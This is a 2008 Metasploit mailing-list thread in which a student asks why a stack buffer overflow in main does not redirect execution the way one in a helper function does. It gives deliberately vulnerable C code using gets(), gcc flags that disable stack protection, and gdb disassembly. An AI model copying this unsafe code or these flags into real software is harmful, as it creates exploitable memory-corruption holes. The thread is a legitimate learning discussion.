Metasploit mailing list archives
Buffer overflow in main
From: wbyoung at u.northwestern.edu (wbyoung at u.northwestern.edu)
Date: Fri, 29 Feb 2008 10:07:07 -0600
Sorry I didn't explain a little more. I understand buffer overflows and how they work. I've read Aleph One's Stack Smashing paper many times. I can overwrite the return address of the main function properly, which I've confirmed in gdb. Here's the disassembly of both functions. Some responses to me personally said to take this off list, so if this is really off topic, feel free to let me know. Here's the disassembly of the two functions. 0x08048374 <main+0>: lea 0x4(%esp),%ecx 0x08048378 <main+4>: and $0xfffffff0,%esp 0x0804837b <main+7>: pushl 0xfffffffc(%ecx) 0x0804837e <main+10>: push %ebp 0x0804837f <main+11>: mov %esp,%ebp 0x08048381 <main+13>: push %ecx 0x08048382 <main+14>: sub $0x44,%esp 0x08048385 <main+17>: lea 0xffffffbc(%ebp),%eax 0x08048388 <main+20>: mov %eax,(%esp) 0x0804838b <main+23>: call 0x80482c4 <gets at plt> 0x08048390 <main+28>: mov $0x0,%eax 0x08048395 <main+33>: add $0x44,%esp 0x08048398 <main+36>: pop %ecx 0x08048399 <main+37>: pop %ebp 0x0804839a <main+38>: lea 0xfffffffc(%ecx),%esp 0x0804839d <main+41>: ret 0x08048374 <run+0>: push %ebp 0x08048375 <run+1>: mov %esp,%ebp 0x08048377 <run+3>: sub $0x48,%esp 0x0804837a <run+6>: lea 0xffffffc0(%ebp),%eax 0x0804837d <run+9>: mov %eax,(%esp) 0x08048380 <run+12>: call 0x80482c4 <gets at plt> 0x08048385 <run+17>: leave 0x08048386 <run+18>: ret On Fri, Feb 29, 2008 at 6:30 AM, bambam <bambam.quiescence at googlemail.com> wrote:
Maybe it's gcc adding calls to exit functions that call the callgate to syscall exit, so main never returns? Don't know, haven't looked at anything this shallow in ages. 2008/2/28 <wbyoung at u.northwestern.edu>:This isn't Metasploit specific, but it seems like a good place to ask: If I have a program: int main() { char buffer[64]; gets(buffer); return 0; } On Ubuntu 7.10 using gcc with --no-stack-protector and -z execstack options to compile, you can overflow the buffer and change the return address of main, but when main completes, it does not return to the address you might want. In this program, you can inject a return address and it returns to the address you specify: void run() { char buffer[64]; gets(buffer); } int main() { run(); return 0; } I believe this has to do with the way libc returns from main, but if someone could explain (in as much detail as possible) or point to a resource that explains what is going on here, that'd be great. Thanks! - Whitney Young _______________________________________________ http://spool.metasploit.com/mailman/listinfo/framework
-------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20080229/1848834f/attachment.htm>
Current thread:
- Buffer overflow in main wbyoung at u.northwestern.edu (Feb 27)
- Buffer overflow in main warlord (Feb 28)
- Buffer overflow in main daniel (Feb 28)
- Message not available
- Buffer overflow in main wbyoung at u.northwestern.edu (Feb 29)